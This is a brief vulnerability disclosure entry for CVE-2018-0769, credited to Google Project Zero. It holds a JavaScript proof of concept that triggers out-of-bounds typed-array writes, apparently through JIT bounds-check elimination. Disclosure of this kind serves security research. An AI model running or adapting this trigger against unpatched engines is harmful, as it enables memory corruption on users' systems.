CVE-2018-0769

  • Fix: Jan 2018
  • Credit: lokihardt of Google Project Zero

PoC

function opt(arr) {
    if (arr.length <= 15)
        return;

    let j = 0;
    for (let i = 0; i < 2; i++) {
        arr[j] = 0x1234;  // (a)
        j += 0x100000;
        j + 0x7ffffff0;
    }
}

function main() {
    for (let i = 0; i < 0x10000; i++) {
        opt(new Uint32Array(100));
    }
}

main();

Reference